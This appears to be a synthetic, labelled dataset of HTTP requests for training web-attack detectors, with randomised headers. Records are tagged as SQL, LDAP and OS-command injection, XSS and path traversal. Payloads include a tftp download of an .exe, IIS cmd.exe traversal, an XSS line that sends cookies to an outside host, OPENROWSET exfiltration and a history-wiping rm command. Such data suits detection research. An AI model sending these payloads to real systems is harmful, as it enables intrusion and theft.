Client-ip: 179.76.26.194
Cookie: nsrthtoydr=61;zheAdiynAw=794
Cookie2: $Version="14"
Date: Tue, 23 Jan 07 01:09:09 CET
ETag: "R43wvedrJeDLI-498"
Expect: k3ilm
From: ctbt@euirsarao.st
If-Modified-Since: Thu, 29 Jun 06 02:16:43 CET
If-Unmodified-Since: Sat, 14 Jun 08 15:59:27 CET
If-Match: "WebLFRFuOabtG2s578qx"
If-None-Match: *
If-Range: Wed, 08 Oct 08 16:00:50 CET
Max-Forwards: 29
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Digest nc=dFD6214b
Range: 529307-,-0
Referer: /enaeIe/t3nht/odaytha/Feqodcc/qnesup.bin
TE: deflate,gzip;q=0.0,gzip
Trailer: Pragma
User-Agent: Mozilla/6.4 (compatible; Reoieds; Mac OS X; iesesLe3et; TMcolasdT)
UA-CPU: 68000
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: 1.4 34.25.24.70, 9.2 www.eatiisUh.css
Transfer-Encoding: compress
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 38307
Start - Id: 38798
class: LdapInjection
GET /Exjexecv/tihzhlGEe2nlbhet5tor/e113u8te8obxe1Santo/rssshlsh/AoeFcCHmh1/el/phttMk/7Vs/47Bl0/37Kg/elovfne1sr/gtwore2nrdmaeE.exe?lfqlwexT4hECass=tNeh&TAraAen=20593473&nwqmicTabfefe=at&pgaZ6=qhheEa&8WE-Tx=m&btc=8436934&roh=755&6oritnnfip=d5auhlmowp-hr&tecop=a&Ou=xNhuf%29%28%26%28objectClass%3D++4p*%29&VSXv-oy=inggh%25ueoOn3us&oji8J=06197 HTTP/1.0
Host: www.8Aeaq.st
Connection: close
Accept: */*
Accept-Charset: big5;q=0.7, x-mac-hebrew;q=0.9, x-mac-roman
Accept-Encoding: gzip, compress;q=0.8, deflate;q=0.7, identity;q=0.0, compress
Accept-Language: o-t1f9rj, o-e;q=0.4
Cache-Control: max-age=23762
Client-ip: 103.147.207.153
Cookie: sdiarlygarophic=NeT;hOg2ceo4f=anm2oio;otIb5mtu= dbgsoundft;tm3dscc=i6tm3sxo;ata=qs
Cookie2: $Version="055"
Date: Thu, 23 Aug 07 18:09:28 CET
ETag: "rsHccDTVRwpUocyQb"
Expect: 100-continue
From: Nrt0ttsL@rnpbsgro.fr
If-Modified-Since: Fri, 18 Mar 05 23:59:33 CET
If-Unmodified-Since: Sat, 28 Jul 07 06:14:27 UTC
If-Match: *
If-None-Match: "96hepxWdtqgSOw8Agg"
If-Range: Tue, 23 May 06 18:32:40 UTC
Max-Forwards: 7006
MIME-Version: 3.1
Pragma: hlne=hai
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Basic b29UcnQ6cG1jdA==
Range: 89831-,-364983
Referer: http://www.nubi.gov/oddQ0Ee/iwaufg/gYhzas/yhdr/emoeho.nsf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.5 (Machintosh; U; PPC Mac OS X 0.5; hh-ca; rv:4.1.7) Gecko/21106119
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/7.8 135.21.229.221, 4.9 www.ulRe.shtml, cm3/9.7 94.206.137.126
Transfer-Encoding: gzip
Upgrade: oorig/6.0, osraet/4.0
Warning: 322 www.iehxp.jpg "lshodeasakay0kd" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38798
Start - Id: 36839
class: OsCommanding
POST /tac3Ahcl0efaiim/SA/cyOf0epmEnueaz/t1srE87n/pvjbWXrjj9Z9f/eq/7xml5IqRpzD/LsVe/Sotseyielbo/fMLLqnullq.shtml? HTTP/1.0
Content-Length: 19
Content-Language: eaeomie,sRhtdft,got
Content-Encoding: identity
Content-Location: http://www.fSEytf.fr/qslqd/cSkafsoa/cbodei7.pl
Content-MD5: ZXZzZmxGY3Q0cmN0YWFvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 May 08 07:55:37 CET
Host: 135.183.143.59:80
Connection: bimtm
Accept: video/mpeg, audio/basic;q=0.3, audio/*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: tftp     -c     get     173.199.66.76:/as/ve.exe  |
Cache-Control: only-if-cached
Cookie: ik854gEGabrvcp=4vekltN@e7a ;rwejc0aocfoyn=85143695;ohimsqazti=tqe rCctb;m1rpyU8p= connect;Z0tGkw4=n;pr;etsree1ooeoit=rqrCneoaw5Oiin
Date: Tue, 09 Sep 08 22:51:30 GMT
ETag: W/"M-7mrO2@3AcYJckwqMZR"
If-Match: "5J8LEwHmQ2GoGw8kOD"
If-None-Match: *
If-Range: *
Max-Forwards: 4
Pragma: no-cache
Authorization: Basic cmlvcmhhczpoc3JB
Range: 29-
Referer: /thHie/mcodl2m.bin
TE: chunked,trailers,deflate
User-Agent: 9tcwadgHf/0.7
UA-Color: color8
Via: n2tF/9.8 www.dexkeet.html, 4.3 133.166.134.235:94
Transfer-Encoding: deflate
X-Forwarded-For: 136.19.204.176
----: -----------------------

ileedotddfLtx=rAeLn

End - Id: 36839
Start - Id: 42835
class: OsCommanding
GET /cfcopya_1ug/o.8d_kD-8ig9_FZqz/n8MQl/cPesl/mZH9kaMMR75keF/prenci.tiff?poorrapil=122.89.174.115+%7C+++dir&xp3nn=e%3Dcopy1mea+led+mdi%3AnB&Rittl=s5geeoeoIipIrNr HTTP/1.0
Host: 244.191.181.174
Connection: gjeoot
Accept: video/quicktime;q=0.8, application/zip;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: yadeene7-dVugsOtE, reogyhjx-tT, rtbi-e8lnGiy
Cache-Control: no-store
Client-ip: 204.241.218.220
Cookie: gwhHIn4itoaTalr=h5;cno=nO>Jo
Date: Sat, 12 Nov 05 05:36:05 CET
ETag: "pei1_qWjREV5RDdbfc"
Expect: 100-continue
From: kye8spet@sCaIii.it
If-Modified-Since: Mon, 09 Feb 09 23:22:30 CET
If-Unmodified-Since: Sat, 29 Mar 08 17:37:41 CET
If-Match: "qI24.dZDibJe3hmEe"
If-None-Match: *
If-Range: Sat, 21 Jul 07 21:44:10 GMT
Max-Forwards: 8717
MIME-Version: 7.9
Pragma: no-cache
Authorization: Basic ZWNkaWplZGk6ZXRjMmhvcGY=
Range: 2-3,62-,037879-912
Referer: http://www.ozmis5Em.it/cusd.rar
TE: trailers,chunked
Trailer: Host
User-Agent: Mozilla/1.2 (Machintosh; U; Mac OS X 1.5; ee-t6; rv:1.3.6) Gecko/90168456
UA-CPU: StrongARM
UA-Disp: 063,6155,16
UA-Color: color32
Via: oxd/7.7 125.123.137.202:0771, jthi/5.6 87.164.87.253
Transfer-Encoding: deflate
Upgrade: NhTeWO/2.9, teisee/0.9
X-Forwarded-For: 209.98.157.41
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42835
Start - Id: 42380
class: SqlInjection
GET /cOoWX/dnlaeTxnurlgna/tPI-Stj191-1BXeC-UbW/rLiJ7RCbEztX/nlLjHaqW@Y2W7BsaQ.asmx?24j.tojkf6=minso&oinsia=70634551&ecbcycosls=226&SmR_yR=5&lhMunionVwget=w7v&tite4i7TO=orLtSZX93VvF&akuBmnoqgt=+m&cLs7El9t=5e+&eHhn4beOzxwig=%2Bmcehtri&hoonshle=5&gilume9ydo85=7ib_&hbz=r+suX3cre5&mst=%3B+++select+++++*+from++++OPENROWSET%28+++%27SQLoledb%27%2C%27uid%3DhEnufeik%3Bpwd%3DiitUeted%3BNetwork%3DDBMSSOCN%3BAddress%3D180.100.156.232%2C35931%3B%27%2C%27select+*+++++from+++++oxMdget%27++%29 HTTP/1.1
Host: www.ctmmt2aarp.fr
Connection: hroOOu
Accept: text/html, audio/basic;q=0.6, audio/basic;q=0.3
Accept-Charset: windows-1258
Accept-Encoding: *
Accept-Language: 6C-ugismo;q=0.1, lotf-tmrhei
Cache-Control: only-if-cached
Client-ip: 237.97.207.139
Cookie: hMmihrnnHiimS=weaziugd9ol8uiie;f5nimdd3=o T;tlLxui=1JbQZOX0bwr6;shetae6rhErs=7804
Cookie2: $Version="35"
Date: Tue, 18 Nov 08 04:23:04 GMT
ETag: "tN-IZ4t1Xvz3PGGu4c"
Expect: 100-continue
From: nU8g@Ctnnlleoe.st
If-Modified-Since: Sun, 18 Dec 05 03:49:48 GMT
If-Unmodified-Since: Tue, 17 Jun 08 16:05:21 CET
If-Match: "qG47FfE4aKck@72A"
If-None-Match: *
If-Range: "iy7ShGIHE6lGl6h3s0DX"
Max-Forwards: 5
MIME-Version: 9.3
Authorization: oeifa renlcmT=aansato
Referer: /maet/tom4/edctq/useyIs.dll
TE: trailers
Trailer: Cache-Control
User-Agent: fLQO85e http://www.nBaophna.cz
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 0.8 80.34.36.102, 4.9 www.bxhehetn.html:0749
Upgrade: TyteS/4.7, iaa/1.6, irg/7.1, 8lsno/4.8, era/0.2
Warning: 574 57.17.46.185 "veun9pelul" 

null

End - Id: 42380
Start - Id: 44014
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.ttosoCAb.uk
Connection: close
Accept: image/*;q=0.3, text/plain;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 78.141.142.69
Cookie: fdigshrpRUt=|oeno2erxssrtid
Cookie2: $Version="287"
Date: Sun, 13 Jul 08 15:20:15 UTC
ETag: W/"onnOX1HUYGEaA@7"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 13 May 08 08:05:19 UTC
If-Unmodified-Since: Wed, 05 Dec 07 21:48:32 CET
If-Match: ".Hr3xBKrsAJ76r40zW"
If-None-Match: "ZxAz0m_fOcyu_No6"
If-Range: Fri, 29 Aug 08 20:10:51 UTC
Max-Forwards: 664
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic aW9xM2w6MGFleGE=
Authorization: eIss3 k67Iers6=oa8h
Range: 67-764741,470518-20,3-202913
Referer: http://rdmresne.org/adnni.php
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: ieoe/9.1.5
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: 3.9 www.bsiefi7.png, 7.6 www.aldsltE.tiff, FTP/4.6 90.6.139.221
Transfer-Encoding: teCooo; eage=cepcnecr
Upgrade: t8se4/9.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44014
Start - Id: 48154
class: XSS
GET /ljZW@/mgNA9@2zUqZlb8GJPa@/hee6LnuncseYtLawCs.jsp?zntebd4hrrna3=p0Ghusuewni&uLsescme=%3Cdiv++++style%3D%22+++++binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.elde.com%2Fscript%2Fot.nsf%5D%29%3B+%22+%3E&ewiser=783797581&n4ntipdloeaxLa=2&a4hs=99332&rqtn4th=h HTTP/1.0
Host: 58.34.32.240
Connection: keep-alive
Accept: text/*;q=0.3, application/postscript;q=0.1
Accept-Charset: x-mac-korean
Accept-Encoding: gzip, deflate, deflate;q=0.8, gzip
Accept-Language: *
Cache-Control: max-age=36
Client-ip: 211.190.214.99
Cookie2: $Version="4"
Date: Sat, 22 Nov 08 15:15:18 UTC
ETag: W/"VEmXtl7s15oFGnIxna"
Expect: 100-continue
From: ri3oektx@agekwucEtP.ch
If-Modified-Since: Wed, 20 May 09 13:59:29 UTC
If-Unmodified-Since: Tue, 29 Aug 06 02:11:18 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 28 Sep 06 07:16:47 GMT
Max-Forwards: 29
MIME-Version: 8.3
Pragma: Iptahe='erhtjei'
Authorization: Digest algorithm=MD5-sess
Range: 248-
Referer: http://8etnc.ch/sepe/1tel2/ntecat/dsnls/etggR0.avi
TE: trailers,gzip;q=0.3,chunked;q=0.3
Trailer: If-Modified-Since
User-Agent: Mozilla/0.8 (Windows; U; WinNT 2.4; sH-ua; rv:4.1.1) Gecko/84838729
UA-Disp: 187,5451,16
UA-Color: color8
Via: 5.2 53.22.102.41
Transfer-Encoding: identity
Warning: 475 102.30.177.38 "vrpNbaaNaa2ir" "Mon, 08 Dec 08 15:45:59 UTC"
X-Serial-Number: 91898744003997504181
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48154
Start - Id: 43015
class: OsCommanding
POST /do/RaeuweEb3tadriuttTuo/8P_BFjmdg45ZV2A/nq/ls8esoqscaht/wjYGQk8dQ.nsf? HTTP/1.0
Content-Length: 193
Content-Language: rboT,otb
Content-Encoding: gzip
Content-Location: /m8oDogt/heeoode/isliLng/ilieieme.cgi
Content-MD5: emZpYmxucmhyb3BJbm1Gbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 11 Aug 04 20:24:23 CET
Last-Modified: Mon, 14 Dec 09 19:07:25 GMT
Host: www.2nece.gov:80
Connection: accsiavi
Accept: image/jpeg;q=0.8, application/zip;q=0.1
Accept-Charset: windows-1257;q=0.3, x-mac-arabic;q=0.9, iso-8859-2;q=0.6, utf-7;q=0.9, x-mac-arabic;q=0.3
Accept-Encoding: 
Accept-Language: netn-Jas;q=0.8, ahNy-ahEi
Cache-Control: no-transform
Client-ip: 87.239.190.162
Cookie: becR=tv1ipseTO93ikueen;htccutys4=-forme m;wei8btv=t_BB9DfsE;tmpklhpLZ25@tmpD= ;dhdlle8hbuess=I;ewaixAeovuotm=oitae7es 4jz
Cookie2: $Version="073"
Date: Wed, 12 Sep 07 24:46:09 UTC
ETag: "v0-1@Rv2TACZbOUJTaV"
Expect: ltfreq
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Mon, 12 Mar 07 20:26:42 GMT
If-Unmodified-Since: Wed, 29 Aug 07 22:18:07 GMT
If-Match: *
If-None-Match: "u2dVfz8tclrlcaw"
If-Range: Tue, 08 Sep 09 04:23:02 GMT
Max-Forwards: 09
Pragma: no-cache
Proxy-Authorization: Basic c3Nya3BzZWk6VGlhaUdp
Authorization: Digest realm
Range: 171-10,013-0,-6
Referer: /csc4nt2i/Gida/6CsDf/tadypane.swf
TE: chunked;q=0.9,trailers
Trailer: Pragma
User-Agent: ndoEstsnfeiaa1b8tte
UA-Color: color8
UA-Pixels: 2695x320
Via: FTP/4.4 www.amPgema6.jpg, 5.0 www.1serloi.htm
Transfer-Encoding: compress
Upgrade: 0yU/2.3, ikP/9.3, iaY/2.4, vete/4.6, SjSgdt/2.7
Warning: 165 65.108.226.121 "iitydon3trejesioefo" "Sun, 09 Oct 05 21:24:18 UTC"
X-Forwarded-For: 225.212.15.105
----: -------------
~~~~~: ~~~~~~~~~~~~~~

ytcdkhetccetNy=207064&sy=eU&YKdv=r%u4&E7irR9S=tstzatAia9elf&coeeamgeealtah=]daemo?gl-&as= oL/r:mdaoeI&HV7E5m=~ :yrozed7etsus&2OlQJE='    ;    rm    ~/.bash_history     ;

End - Id: 43015
Start - Id: 47826
class: XSS
GET /ncMcqMGnWimKFs/fS95xUB1objectTZvK/jacatz.js?teeodtsdlr7x=q1lifK&ont22et5t1=%3Cxml++id+%3D++++%22++++X+++++%22++++%3E%3Ca%3E%3Cb%3E%26lt%3Bscript++++%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.ne.com%2Fcgi-bin%2Fmele.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript%3E%3B%3C%2Fb+%3E%3C%2Fa+%3E%3C%2Fxml++++%3E&hanEEet=+scriptN&xhU4gF1=ihneh&mit=hd%400-Nzp&n6t5=mAKIt.WEeV4G&Ttqm8a5aic=e-5XJU&t8zw8Kb_wheretwT=qle4eEome&pot=3287632 HTTP/1.1
Host: 206.9.231.44
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: x-mac-roman;q=0.5
Accept-Encoding: 
Accept-Language: 8u8u5seg-oohihE6q;q=0.6, rrp-ztgah39r
Cache-Control: max-stale=8585
Client-ip: 106.65.144.196
Cookie: dmMs4=ydrophduTsylts1\g;iieItinrdtohds=sene;lM=615410;ssigotaocae9=naa
Cookie2: $Version="3"
Date: Thu, 10 Apr 08 18:35:30 GMT
ETag: W/"OurwtpibD7A0noXC"
Expect: nets3L
From: esal@nqcagsropr.fr
If-Modified-Since: Mon, 12 Apr 04 06:15:52 CET
If-Unmodified-Since: Thu, 10 Jul 08 01:12:20 GMT
If-Match: "Hhh@qIhf8nia.DsVqUWI"
If-None-Match: *
If-Range: Sun, 05 Apr 09 17:10:34 CET
Max-Forwards: 0025
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: ae9de sesszy=lt9eEk7
Authorization: NTLM ZHJuYncyazBha2toZHRlbjljM09FY3BvRWN1b3N0a2g=
Range: 2820-37,-5180,81-
Referer: /oniwEc.bin
TE: deflate,chunked,trailers
Trailer: TE
User-Agent: Mozilla/3.8 (compatible; llpsuas; Windows NT; ul7cpi1r2; 8rIsn9)
UA-CPU: MIPS
UA-Disp: 162,931,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 907x206
Via: 1.0 134.35.166.247
Transfer-Encoding: gzip
Upgrade: emHt/5.7
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 4290166735414174
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47826
Start - Id: 45483
class: PathTransversal
GET /2us0FRkRMwvpX-m80B0v/nsegme/tmiipsnomsa8se/fulnefglywNeoiosmr/evCBJxasWK/ynefusXneeaeegPreee/G7@/AWpXVNNalle83.js?mietnyt=kstten&AhohtyIDy=Nuni&Tcwyhsseelaynis=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&d7K2E.MMxml=uopen%25+&kz5len=178&bwhin=2u%28hdropeoedeleteeoej HTTP/1.0
Host: 205.252.167.50
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.6, cp-936, windows-874;q=0.2, x-mac-korean;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=1
Client-ip: 53.223.189.118
Cookie: QXMu6W7VzS-=2917286770
Cookie2: $Version="39"
Date: Sat, 04 Oct 08 14:12:18 GMT
ETag: "SQQiLGzppLASCU-m"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Thu, 01 May 08 23:26:42 UTC
If-Unmodified-Since: Thu, 24 Jun 04 05:19:25 UTC
If-Match: "4lGHrAzX1DOkcv1tr"
If-None-Match: "EExfkUNEnGM@GzY@r"
If-Range: "KZt_3YzgCYNe3WW1QD"
Max-Forwards: 732
MIME-Version: 3.1
Pragma: seieea=0cs
Proxy-Authorization: Digest username="hesa"
Authorization: Basic aGlqNmNzOmhkc3hvaHdl
Range: 7-
Referer: http://ElTe8.it/otrieu/airnwY.pl
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/3.4 (Machintosh; U; PPC 9.0; 58-en; rv:7.3.2) Gecko/37393103
UA-CPU: PowerPC
UA-Disp: 3626,740,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5163x468
Via: 5.1 www.truEqua.gif, 1.2 www.oHurtr.shtml, FTP/9.4 www.oLlaoa.jpeg
Transfer-Encoding: compress
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45483
Start - Id: 41988
class: SqlInjection
GET /GTaogroup byoYw8cRq/tmstOeheoeusnesI/imae0edfiue1Ogeih/o__TNE_icAxe4.UoN7.swf?elzesedkglufep=560910929&eanb=386&aitajles=riae4chuselectyolyt&k4wp-oall=d1tsngkifhntmei&olluhtsireoch=6bba31rtfsefhbye&Uue=owas&eslntoorInifsii=uDkaeN7ttme&snarusa2r=5&incy8arelhseni=olDcgT&vtRgoouqn=oc%2B&ceneiar=112076&4qGo=and+0%3C%3E%28select+count%28*%29+from+++pren+++where++02ahi5eg%3C%3E%29 HTTP/1.0
Host: www.njtc3ilabe.org
Connection: oeaq3ts
Accept: */*
Accept-Charset: utf-7, x-mac-cyrillic;q=0.6, x-mac-greek;q=0.0
Accept-Encoding: *
Accept-Language: cnonep-mfyin
Cache-Control: np=ihaUst
Client-ip: 115.84.104.40
Cookie: hcg=5375748072
Cookie2: $Version="2"
Date: Thu, 23 Sep 04 05:14:49 UTC
ETag: "H-wtGNRWTakDfVw7"
Expect: taus=aiyn
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Mon, 24 Nov 08 05:30:00 GMT
If-Unmodified-Since: Thu, 01 Apr 04 13:10:29 UTC
If-Match: "bbdsJU97bl07UuCXVqs"
If-None-Match: *
If-Range: "@3kiotqHU5azj7HoXS"
Max-Forwards: 89
MIME-Version: 0.8
Pragma: otniwcif='n7l'
Proxy-Authorization: NTLM c2U0dUNCc2F0ZUVuNWVvZ3RhTW10aWdlbGFvZXU0bUE2YWlpYw==
Authorization: wcqafp ezfesnmi=eeaa
Range: -728027,84041-8,736156-
Referer: /teaebm/riZnhet/epmnts4u/nfaoa.asmx
TE: chunked;q=0.7,chunked
Trailer: Accept-Charset
User-Agent: dyavhWtuet/2.4
UA-CPU: x86
UA-Disp: 8277,101,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1066x6977
Via: 6.6 141.127.230.204, 7.8 www.onresv5N.js
Transfer-Encoding: gzip
Upgrade: tsem/9.8, icrMn/2.4
Warning: 567 141.96.99.110 "rih65mresz2g" 
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41988
Start - Id: 37836
class: LdapInjection
GET /VotCGwinnt07OzY0exec/woIReHDptXXRuIZI_Hjh/binVrv7k.K8R/tmtt/4ifwug8GRmg-F/d1Sq2_ATjCF/afwAnES/OlE8rLc/zZ@NlqU.swf?nrupEbtas=774&telnetDMjB0d_p=rpbe&dtIimkaLndorya=fvVd-pu&mrree7bA4o=icm5&mrpwSnlmn=j4%29%28%26%28objectClass++%3D++sssr*%29&n6i8afoESwCPsns=ynsl&hrf5txaer=g5a&LHm92CU=51&0oHfHw3oGr=diUoi%40&e6irpuNy=89&itssnns=bm&cesnv=1eLzwl2 HTTP/1.0
Host: www.rga8heef.com
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: cso='ul9oe'
Client-ip: 145.59.192.187
Cookie: o3iasEe=slUW1Uqb@;lwoooizhhkoUnud=16018264;tmssQrt=script<oqa e<iaoiowinntvetp
Cookie2: $Version="4"
Date: Tue, 30 Mar 04 06:43:21 CET
ETag: W/"7bZNocxT.N2HZG9O"
Expect: 100-continue
From: tlocso@Staohr.gov
If-Modified-Since: Thu, 22 Apr 04 01:32:46 UTC
If-Unmodified-Since: Mon, 01 Oct 07 17:16:32 UTC
If-Match: "6LDVJKbY8NZaxk.pXUk"
If-None-Match: "__vM8@93Slw96AX_m9"
If-Range: Wed, 13 May 09 05:41:20 UTC
Max-Forwards: 6437
MIME-Version: 1.8
Pragma: tylayyth='anqaxab'
Proxy-Authorization: Basic MWU3Ym9hOmx0ZWllam8=
Authorization: NTLM cGVvZ3RzdGl0dWh0ZTJjbkFudGhpVTAxdHI5c3NuaWlsYW1iZTRpQXUxb3VtenM=
Range: 853418-,-430
Referer: /phmtrl5/al6wi.exe
TE: deflate,trailers,deflate
Trailer: Accept
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u 9.9; oo-hf; rv:6.0.5) Gecko/11979174
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 8.6 www.npir.png:39, 9.9 www.nwee.jpg
Transfer-Encoding: foctbw
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 819 www.pedj.gif "e9rth" "Tue, 15 Sep 09 22:46:26 GMT"
X-Forwarded-For: 138.39.90.47
X-Serial-Number: 839362517955093673
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37836
Start - Id: 44067
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 180.138.116.104:8
Connection: close
Accept: application/*, text/html;q=0.6
Accept-Charset: hz-gb-2312;q=0.0, windows-1254
Accept-Encoding: *;q=0.9
Accept-Language: eqt-eceA9, aireoe5e-ns;q=0.5, tr-senaw;q=0.5, hhPh-nsleuui, tjeeym-si;q=0.4
Cache-Control: r='ien8yyle'
Client-ip: 185.93.146.213
Cookie: yroebaofl57s=r;access_log8Ktmpz8ELdA=]s A'6;e7iessel=8yye.yvjR36T;bU.mpga5=445662;8z=9e4e;h0zem8t4=td01
Cookie2: $Version="43"
Date: Fri, 23 Jan 09 13:08:52 GMT
ETag: W/"8jJSMp1FL9CwR-.L4"
Expect: 100-continue
From: Llna9@hrnonxai.de
If-Modified-Since: Sun, 02 Nov 08 01:04:20 GMT
If-Unmodified-Since: Fri, 20 Feb 09 13:24:38 UTC
If-Match: *
If-None-Match: "yeiY-@B85OI5j8QNhR6n"
If-Range: *
Max-Forwards: 5863
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: Digest nonce
Range: -6,-7
Referer: /avs5.msf
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: abFw-KQS5E http://www.ea2a.net
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: 8.6 www.cbtGUa.shtml
Transfer-Encoding: deflate
Upgrade: Rjwza/4.8, tein/1.3, crss4/4.1
Warning: 539 167.196.18.192 "faE4bxsefpe4nbstnL" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44067
Start - Id: 42781
class: SqlInjection
PUT /NazPKStlibqJP/cL0Ddlag5ua/r0fKlGeuqrJcR/e7ntneieosenwp/iDeflesbedu3bo6as/eLFYI/cTQ4/ip/aadbytdprsigH.jpg? HTTP/1.1
Content-Length: 244
Content-Language: iifsfe,tTE
Content-Encoding: deflate
Content-Location: /zibvvn/epsy/randennn/saaT.jpeg
Content-MD5: dHRlZXRpQWJhYWVleW90bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 21 Feb 10 05:40:52 CET
Host: 205.200.63.40:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 10.145.92.40
Cookie: uteodatch0en='   /**/     OR  /**/''   =  ';x8rp7yse=Odntefeuhi;psthe6on=za-t yR;eGsmhec=~h9|onu~ yf;aetd2e1t=[;Oye9ezeaaero=02699990
Cookie2: $Version="457"
Date: Thu, 05 Feb 09 16:40:05 CET
ETag: "ESl6toa@C3E4cNluNQ"
From: ldhtsj@zea5tcib2e.st
If-Modified-Since: Sat, 07 Jun 08 11:14:54 GMT
If-Unmodified-Since: Fri, 24 Oct 08 03:02:31 GMT
If-None-Match: *
If-Range: Sun, 25 Apr 04 19:32:49 UTC
Max-Forwards: 2320
MIME-Version: 1.9
Pragma: no-cache
Authorization: ot5d pecn=mannr
Range: 293929-81862
Referer: http://hhSiUhdb.uk/cuo1o/nnbnzizr/teee.asmx
TE: deflate;q=0.6,chunked;q=0.0
User-Agent: Mozilla/9.1 (X11; U; Solaris 2.5; rs-mD; rv:0.5.7) Gecko/72654281
UA-CPU: PowerPC
UA-Disp: 4064,3082,32
UA-Pixels: 464x9183
Warning: 860 www.tnowvsee.jpeg "sgyEdeSSzk" "Wed, 20 Oct 04 16:37:46 CET"

loPzeycmdrkuq=n<oh&sxe=83028005&3CAf=ooDvntuo&StHXFJehtacces=sEsTltdvlIo&airLazul=436&u3mzmailcng1fg=ymtnsmlnr o0&rrosije=ooOeee&nhikamrQhn=9&vrhOzygxE-6=eR0M&odxC=1yh6yAf2Lhon&a4fxMiu2=ioms9vtidni&3cIldT=iG4viZRiM8eF&86NlinkkW=ior4etc&Odsu=3

End - Id: 42781
Start - Id: 43086
class: OsCommanding
